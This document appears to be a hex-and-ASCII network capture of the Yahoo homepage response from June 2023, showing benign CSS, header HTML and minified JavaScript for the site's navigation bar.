                                                                                                                                                                        Data Ascii: prefers-color-scheme:dark){html[data-color-theme-enabled] ._yb_1qzxw{background:#232a31;background:var(--yb-batcave);border:0;box-shadow:0 4px 8px 0 rgb(0 0 0/9%),0 0 1px 0 rgb(0 0 0/9%);border-radius:8px}}._yb_xc7ma{font-weight:500;font-weight:var(--yb-f
                                                                                                                                                                        2023-06-02 11:13:21 UTC376INData Raw: 5f 79 62 5f 31 73 31 76 74 20 2e 79 6e 73 2d 70 72 6f 6d 6f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 64 69 73 70 6c 61 79 2d 70 75 73 68 2d 70 72 6f 6d 6f 73 20 2e 5f 79 62 5f 31 73 31 76 74 20 2e 79 6e 73 2d 70 72 6f 6d 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 79 62 5f 31 73 31 76 74 20 2e 79 6e 73 2d 70 72 6f 6d 6f 20 2e 79 6e 73 2d 70 72 6f 6d 6f 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 5f 79 62 5f 31 73 31 76 74 20 2e 79 6e 73 2d 70 72 6f 6d 6f 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 61 63 6b 67 72 6f
                                                                                                                                                                        Data Ascii: _yb_1s1vt .yns-promo{display:none}.display-push-promos ._yb_1s1vt .yns-promo{display:block}._yb_1s1vt .yns-promo .yns-promo-content{padding-right:0!important;height:auto}._yb_1s1vt .yns-promo:after{content:'';display:block;background-color:#e0e4e9;backgro
                                                                                                                                                                        2023-06-02 11:13:21 UTC378INData Raw: 73 2c 6d 61 78 2d 68 65 69 67 68 74 20 30 73 20 6c 69 6e 65 61 72 20 2e 34 73 2c 6f 70 61 63 69 74 79 20 2e 31 35 73 20 6c 69 6e 65 61 72 20 2e 34 73 3b 77 69 64 74 68 3a 32 35 39 70 78 3b 72 69 67 68 74 3a 2d 33 38 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 31 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 32 30 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 5f 79 62 5f 76 74 63 62 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 66 36 39 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28
                                                                                                                                                                        Data Ascii: s,max-height 0s linear .4s,opacity .15s linear .4s;width:259px;right:-38px;display:block;padding:14px;position:absolute;z-index:1200;white-space:normal;border-radius:8px;visibility:hidden;opacity:1}._yb_vtcbf{background-color:#0f69ff;background-color:var(
                                                                                                                                                                        2023-06-02 11:13:21 UTC379INData Raw: 76 68 20 2d 20 31 31 30 70 78 29 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 74 6f 70 3a 33 33 70 78 7d 2e 5f 79 62 5f 31 79 78 73 34 3a 62 65 66 6f 72 65 2c 2e 5f 79 62 5f 31 79 78 73 34 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 34 34 70 78 7d 2e 5f 79 62 5f 78 63 37 6d 61 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 20 30 20 30 20 2d 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 33 70 78 20 33 70 78 20 30 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 5f 79 62 5f 78 63 37 6d 61 3e 6c 61 62 65 6c 3a 66 6f 63 75 73 2c 2e 5f 79 62 5f 78 63 37 6d 61 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65
                                                                                                                                                                        Data Ascii: vh - 110px);overflow-y:auto;top:33px}._yb_1yxs4:before,._yb_1yxs4:after{right:44px}._yb_xc7ma input[type=checkbox]{position:absolute;width:100%;height:100%;margin:-1px 0 0 -1px;padding:0 3px 3px 0;opacity:0}._yb_xc7ma>label:focus,._yb_xc7ma input[type=che
                                                                                                                                                                        2023-06-02 11:13:21 UTC380INData Raw: 69 66 69 63 61 74 69 6f 6e 73 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 2e 5f 79 62 5f 31 75 38 70 6d 20 2e 79 6e 73 2d 70 61 6e 65 6c 2d 68 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 35 70 78 20 32 30 70 78 7d 2e 5f 79 62 5f 31 75 38 70 6d 20 2e 79 6e 73 2d 6c 69 6e 6b 2c 2e 5f 79 62 5f 31 75 38 70 6d 20 2e 79 6e 73 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 30 70 78 7d 2e 5f 79 62 5f 31 75 38 70 6d 20 2e 79 6e 73 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 70 78 7d 2e 5f 79 62 5f 31 75 38 70 6d 20 2e 79 6e 73 2d 64 6f 74 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75
                                                                                                                                                                        Data Ascii: ifications{padding-bottom:5px}._yb_1u8pm .yns-panel-header{padding:20px 0 5px 20px}._yb_1u8pm .yns-link,._yb_1u8pm .yns-link:hover{padding:15px 20px}._yb_1u8pm .yns-content{padding-left:16px}._yb_1u8pm .yns-dot{font-style:normal;font-family:'Helvetica Neu
                                                                                                                                                                        2023-06-02 11:13:21 UTC382INData Raw: 69 64 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 79 6e 73 2d 70 61 6e 65 6c 2d 66 6f 6f 74 65 72 2d 61 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 2c 23 66 66 66 29 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 73 6f 6c 69 64 20 31 70 78 20 23 66 30 66 33 66 35 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 73 6f 6c 69 64 20 31 70 78 20 76 61 72 28 2d 2d 67 72 65 79 2d 68 61 69 72 2c 23 66 30 66 33 66 35 29 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 7d 2e 79 6e 73 2d 6e
                                                                                                                                                                        Data Ascii: ide{display:none}.yns-panel-footer-action{background-color:#fff;background-color:var(--white,#fff);border-top:solid 1px #f0f3f5;border-top:solid 1px var(--grey-hair,#f0f3f5);padding:10px 0;text-align:center;position:absolute;left:0;right:0;bottom:0}.yns-n
                                                                                                                                                                        2023-06-02 11:13:21 UTC383INData Raw: 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 33 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 31 31 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 39 36 70 78 7d 2e 79 6e 73 2d 70 72 6f 6d 6f 2e 79 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 79 6e 73 2d 70 72 6f 6d 6f 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 34 70 78 3b 72 69 67 68 74 3a 34 70 78 7d 2e 79 6e 73 2d 70 72 6f 6d 6f 2e 79 6e 73 2d 6e 6f 2d 6c 6f 67 6f 20 2e 79 6e 73 2d 70 72 6f 6d 6f 2d 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 79 6e 73 2d 70 72 6f 6d 6f 2e 79 6e 73 2d 6e 6f 2d 6c 6f 67 6f 20 2e 79 6e 73 2d 70 72 6f 6d 6f 2d 63 6f 6e 74 65 6e 74 2e 79 6e 73 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 79 6e 73 2d 63
                                                                                                                                                                        Data Ascii: :13px;height:35px;max-width:111px;min-width:96px}.yns-promo.yns-container .yns-promo-button{position:absolute;top:4px;right:4px}.yns-promo.yns-no-logo .yns-promo-logo{display:none}.yns-promo.yns-no-logo .yns-promo-content.yns-content{padding-left:0}.yns-c
                                                                                                                                                                        2023-06-02 11:13:21 UTC384INData Raw: 3d 22 5f 79 62 5f 31 66 6d 67 61 22 3e 44 69 73 63 6f 76 65 72 20 73 6f 6d 65 74 68 69 6e 67 20 6e 65 77 20 65 76 65 72 79 20 64 61 79 20 66 72 6f 6d 20 4e 65 77 73 2c 20 53 70 6f 72 74 73 2c 20 46 69 6e 61 6e 63 65 2c 20 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 61 6e 64 20 6d 6f 72 65 21 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 31 32 35 33 69 20 5f 79 62 5f 31 6a 69 76 64 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 6a 35 64 61 62 20 5f 79 62 5f 73 62 6e 61 6d 22 3e 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 31 64 68 68 77 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 5f 79 62 5f 67 64 79 36 70 22 3e
                                                                                                                                                                        Data Ascii: ="_yb_1fmga">Discover something new every day from News, Sports, Finance, Entertainment and more!</div> </div></div></div></div></div> <div class="_yb_1253i _yb_1jivd"><div class="_yb_j5dab _yb_sbnam"> <div class="_yb_1dhhw"><h1 class="_yb_gdy6p">
                                                                                                                                                                        2023-06-02 11:13:21 UTC385INData Raw: 71 22 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 5f 79 62 5f 6c 76 62 69 63 20 20 5f 79 62 5f 31 69 75 73 69 20 20 5f 79 62 5f 39 70 78 71 74 20 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 20 20 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 6e 61 6d 65 3d 22 79 62 61 72 5f 6d 6f 64 5f 73 65 61 72 63 68 62 6f 78 5f 73 22 20 69 64 3d 22 79 62 61 72 2d 73 66 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 26 23 78 32 46 3b 26 23 78 32 46 3b 73 65 61 72 63 68 2e 79 61 68 6f 6f 2e 63 6f 6d 26 23 78 32 46 3b 73 65 61 72 63 68 22 20 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 64 61 74 61 2d 61 70 70 69 64 3d 22 79 66 70 2d 74 22 20 64 61 74 61 2d 70 75 62 69 64 3d 22 22 20 20
                                                                                                                                                                        Data Ascii: q"><form class="_yb_lvbic _yb_1iusi _yb_9pxqt ybar-enable-search-ui " method="get" name="ybar_mod_searchbox_s" id="ybar-sf" role="search" action="https:&#x2F;&#x2F;search.yahoo.com&#x2F;search" accept-charset="utf-8" data-appid="yfp-t" data-pubid=""
                                                                                                                                                                        2023-06-02 11:13:21 UTC387INData Raw: 36 36 36 20 30 20 30 20 30 2d 2e 39 34 2d 2e 39 34 31 4c 38 20 37 2e 30 35 39 7a 22 20 66 69 6c 6c 3d 22 23 32 33 32 41 33 31 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 62 75 74 74 6f 6e 3e 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 69 64 3d 22 79 62 61 72 2d 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 72 61 70 69 64 2d 6e 6f 63 6c 69 63 6b 2d 72 65 73 70 20 5f 79 62 5f 6d 6b 39 32 37 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 76 61 6c 75 65 3d 22 53 65 61 72 63 68 22 20 64 61 74 61 2d 79 6c 6b 3d 22 73 6c 6b 3a 77 65 62 73 72 63 68 3b 65 6c 6d 3a 73 65 61 72 63 68 3b 65 6c 6d 74 3a 69 63 6f 6e 3b 73 65 63 3a 79 62 61 72 3b 73 75 62 73 65 63 3a 73 65 61 72 63 68 62 6f
                                                                                                                                                                        Data Ascii: 666 0 0 0-.94-.941L8 7.059z" fill="#232A31"></path></svg></span> </button> <button type="submit" id="ybar-search" class="rapid-noclick-resp _yb_mk927" aria-label="Search" value="Search" data-ylk="slk:websrch;elm:search;elmt:icon;sec:ybar;subsec:searchbo
                                                                                                                                                                        2023-06-02 11:13:21 UTC388INData Raw: 33 34 31 20 36 2e 33 33 31 34 32 20 32 2e 38 33 33 34 31 43 35 2e 33 38 37 39 35 20 32 2e 38 33 33 34 31 20 34 2e 35 30 38 34 36 20 33 2e 32 30 30 39 39 20 33 2e 38 35 32 38 33 20 33 2e 38 35 36 32 35 43 32 2e 34 39 33 36 31 20 35 2e 32 33 30 36 37 20 32 2e 34 39 33 36 31 20 37 2e 34 35 32 31 34 20 33 2e 38 35 32 38 33 20 38 2e 38 31 30 35 38 5a 22 20 66 69 6c 6c 3d 22 23 32 33 32 41 33 31 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 20 3c 2f 64 69 76 3e 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 66 72 22 20 76 61 6c 75 65 3d 22 79 66 70 2d 74 22 20 20 20 20 20 64 61 74 61 2d 74 6e 56 61 6c 75 65 3d 22 66 70 2d 74 74 73 2d 73 61 22 20 3e 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65
                                                                                                                                                                        Data Ascii: 341 6.33142 2.83341C5.38795 2.83341 4.50846 3.20099 3.85283 3.85625C2.49361 5.23067 2.49361 7.45214 3.85283 8.81058Z" fill="#232A31"></path></svg> </div> <input type="hidden" name="fr" value="yfp-t" data-tnValue="fp-tts-sa" > <input type="hidde
                                                                                                                                                                        2023-06-02 11:13:21 UTC389INData Raw: 26 71 75 6f 74 3b 70 61 6e 65 6c 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 68 65 61 64 65 72 4d 73 67 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6d 70 74 79 50 61 6e 65 6c 4d 73 67 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 59 6f 75 20 68 61 76 65 20 6e 6f 20 6e 65 77 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 72 72 6f 72 4d 73 67 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 50 6c 65 61 73 65 20 63 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 2e 26 71 75 6f 74 3b 7d 7d 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 79 62 61 72 4e 6f 74 69 66 69 63 61 74 69 6f 6e 4d 65 6e 75 22 20 74 79 70 65 3d 22 63 68 65 63 6b 62
                                                                                                                                                                        Data Ascii: &quot;panel&quot;:{&quot;headerMsg&quot;:&quot;Notifications&quot;,&quot;emptyPanelMsg&quot;:&quot;You have no new notifications.&quot;,&quot;errorMsg&quot;:&quot;Please check back later.&quot;}}" tabindex="0"><input id="ybarNotificationMenu" type="checkb
                                                                                                                                                                        2023-06-02 11:13:21 UTC389INData Raw: 3d 22 79 62 61 72 4e 6f 74 69 66 69 63 61 74 69 6f 6e 4d 65 6e 75 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 79 62 61 72 4e 6f 74 69 66 69 63 61 74 69 6f 6e 4d 65 6e 75 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 79 62 61 72 4e 6f 74 69 66 69 63 61 74 69 6f 6e 4d 65 6e 75 22 20 63 6c 61 73 73 3d 22 72 61 70 69 64 2d 6e 6f 6e 61 6e 63 68 6f 72 2d 6c 74 20 79 62 61 72 2d 69 63 6f 6e 2d 73 70 72 69 74 65 20 5f 79 62 5f 68 65 7a 6d 6d 20 5f 79 62 5f 39 67 76 74 7a 22 3e 3c 73 70 61 6e 20 69 64 3d 22 6e 6f 74 69 66 2d 62 61 64 67 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f
                                                                                                                                                                        Data Ascii: ="ybarNotificationMenu" aria-controls="ybarNotificationMenu" aria-haspopup="true" aria-label="Notifications" tabindex="-1"> <label for="ybarNotificationMenu" class="rapid-nonanchor-lt ybar-icon-sprite _yb_hezmm _yb_9gvtz"><span id="notif-badge"></span></
                                                                                                                                                                        2023-06-02 11:13:21 UTC391INData Raw: 69 78 22 20 76 61 6c 75 65 73 3d 22 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 37 20 30 22 3e 3c 2f 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 3e 3c 66 65 4f 66 66 73 65 74 20 64 79 3d 22 32 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 22 3e 3c 2f 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 3e 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 74 79 70 65 3d 22 6d 61 74 72 69 78 22 20 76 61 6c 75 65 73 3d 22 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 2e 35 20 30 22 3e 3c 2f 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 3e 3c 66 65 42 6c 65 6e 64 20 69
                                                                                                                                                                        Data Ascii: ix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"></feColorMatrix><feOffset dy="2"></feOffset><feGaussianBlur stdDeviation="1"></feGaussianBlur><feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.5 0"></feColorMatrix><feBlend i
                                                                                                                                                                        2023-06-02 11:13:21 UTC392INData Raw: 20 66 69 6c 6c 3d 22 23 35 64 35 65 66 66 22 3e 3c 2f 70 61 74 68 3e 3c 2f 67 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 79 62 5f 67 77 61 67 68 20 5f 79 62 5f 66 61 64 6a 66 22 3e 4d 61 69 6c 3c 2f 73 70 61 6e 3e 20 20 3c 2f 61 3e 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 65 6e 31 74 63 20 5f 79 62 5f 31 64 6d 7a 61 20 20 22 20 69 64 3d 22 79 62 61 72 4d 61 69 6c 50 72 65 76 69 65 77 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 59 61 68 6f 6f 20 4d 61 69 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 74 73 65 6c 71 20 5f 79 62 5f 31 71 7a 78 77 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 62 5f 31 73 34 30 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 79 62 5f 73 37 75 37 67 20
                                                                                                                                                                        Data Ascii: fill="#5d5eff"></path></g></g></svg> <span class="_yb_gwagh _yb_fadjf">Mail</span> </a> <div class="_yb_en1tc _yb_1dmza " id="ybarMailPreview" aria-label="Yahoo Mail"><div class="_yb_tselq _yb_1qzxw"><div class="_yb_1s40c"><a class="_yb_s7u7g
                                                                                                                                                                        2023-06-02 11:13:21 UTC393INData Raw: 70 6b 67 74 3a 6d 69 64 3b 69 74 63 3a 30 3b 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 20 69 64 3d 22 72 6f 6f 74 5f 31 22 20 3e 20 20 20 20 20 20 4d 61 69 6c 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 20 3c 2f 61 3e 20 3c 2f 6c 69 3e 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 5f 79 62 5f 70 32 37 62 62 20 20 22 20 3e 20 20 3c 61 20 63 6c 61 73 73 3d 22 5f 79 62 5f 6c 69 76 78 30 20 20 20 72 61 70 69 64 2d 6e 6f 63 6c 69 63 6b 2d 72 65 73 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 26 23 78 32 46 3b 26 23 78 32 46 3b 6e 65 77 73 2e 79 61 68 6f 6f 2e 63 6f 6d 26 23 78 32 46 3b 22 20 64 61 74 61 2d 79 6c 6b 3d 22 63 70 6f 73 3a 31 3b 73 6c 6b 3a 4e 65 77 73 3b 65 6c 6d 3a 6e 61 76 63 61 74 3b 73 65 63 3a 79 62 61 72
                                                                                                                                                                        Data Ascii: pkgt:mid;itc:0;" target="_self" id="root_1" > Mail <span></span> </a> </li> <li class="_yb_p27bb " > <a class="_yb_livx0 rapid-noclick-resp" href="https:&#x2F;&#x2F;news.yahoo.com&#x2F;" data-ylk="cpos:1;slk:News;elm:navcat;sec:ybar
                                                                                                                                                                        2023-06-02 11:13:21 UTC394INData Raw: 3b 22 20 64 61 74 61 2d 79 6c 6b 3d 22 63 70 6f 73 3a 35 3b 73 6c 6b 3a 4c 69 66 65 3b 65 6c 6d 3a 6e 61 76 63 61 74 3b 73 65 63 3a 79 62 61 72 3b 73 75 62 73 65 63 3a 6e 61 76 72 61 69 6c 3b 70 6b 67 74 3a 6d 69 64 3b 69 74 63 3a 30 3b 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 20 69 64 3d 22 72 6f 6f 74 5f 36 22 20 3e 20 20 20 20 20 20 4c 69 66 65 20 20 20 20 20 20 20 3c 2f 61 3e 20 3c 2f 6c 69 3e 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 5f 79 62 5f 70 32 37 62 62 20 20 22 20 3e 20 20 3c 61 20 63 6c 61 73 73 3d 22 5f 79 62 5f 6c 69 76 78 30 20 20 20 72 61 70 69 64 2d 6e 6f 63 6c 69 63 6b 2d 72 65 73 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 26 23 78 32 46 3b 26 23 78 32 46 3b 73 68 6f 70 70 69 6e 67 2e 79 61 68 6f 6f 2e 63 6f
                                                                                                                                                                        Data Ascii: ;" data-ylk="cpos:5;slk:Life;elm:navcat;sec:ybar;subsec:navrail;pkgt:mid;itc:0;" target="_self" id="root_6" > Life </a> </li> <li class="_yb_p27bb " > <a class="_yb_livx0 rapid-noclick-resp" href="https:&#x2F;&#x2F;shopping.yahoo.co
                                                                                                                                                                        2023-06-02 11:13:21 UTC396INData Raw: 20 20 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 2d 6d 63 64 6e 2e 73 65 63 75 72 65 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 79 62 61 72 2f 63 65 72 65 62 72 6f 5f 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 22 3e 77 69 6e 64 6f 77 2e 24 5f 6d 6f 64 5f 79 62 61 72 3d 7b 72 65 61 64 79 3a 66 75 6e 63 74 69
                                                                                                                                                                        Data Ascii: </div><script defer charset="utf-8" type="text/javascript" src="https://edge-mcdn.secure.yahoo.com/ybar/cerebro_min.js"></script></div></div><script nonce="b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113">window.$_mod_ybar={ready:functi
                                                                                                                                                                        2023-06-02 11:13:21 UTC397INData Raw: 43 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 63 72 6f 6c 6c 54 68 72 65 73 68 6f 6c 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 73 63 72 6f 6c 6c 54 68 72 65 73 68 6f 6c 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 44 45 46 41 55 4c 54 5f 53 43 52 4f 4c 4c 5f 54 48 52 45 53 48 4f 4c 44 2c 67 3d 6e 75 6c 6c 21 3d 3d 28 61 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 73 3d 6e 75 6c 6c 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 62 75 63 6b 65 74 43 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 73 63 72 6f 6c 6c 55 70 54 68 72 65 73 68 6f 6c 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 6e 75 6c 6c 3d
                                                                                                                                                                        Data Ascii: Config)||void 0===t?void 0:t.scrollThreshold)&&void 0!==i?i:null==n?void 0:n.scrollThreshold)&&void 0!==o?o:DEFAULT_SCROLL_THRESHOLD,g=null!==(a=null!==(r=null===(s=null==m?void 0:m.bucketConfig)||void 0===s?void 0:s.scrollUpThreshold)&&void 0!==r?r:null=
                                                                                                                                                                        2023-06-02 11:13:21 UTC398INData Raw: 6e 67 3f 5f 5b 6e 5d 2e 6f 6e 41 66 74 65 72 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 28 65 29 7d 3a 43 28 65 29 7d 29 29 2c 77 3d 62 2e 73 63 72 6f 6c 6c 54 6f 70 7d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 43 6f 6d 6d 6f 6e 6a 73 4d 6f 64 75 6c 65 28 65 29 7b 76 61 72 20 6e 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 28 6e 2c 6e 2e 65 78 70 6f 72 74 73 29 2c 6e 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 76 65 6e 74 65 6d 69 74 74 65 72 33 3d 63 72 65 61 74 65 43 6f 6d 6d 6f 6e 6a 73 4d 6f 64 75 6c 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 74 3d 22 7e 22 3b 66 75 6e 63 74 69
                                                                                                                                                                        Data Ascii: ng?_[n].onAfterTransition=function(){C(e)}:C(e)})),w=b.scrollTop}))};function createCommonjsModule(e){var n={exports:{}};return e(n,n.exports),n.exports}var eventemitter3=createCommonjsModule((function(e){var n=Object.prototype.hasOwnProperty,t="~";functi
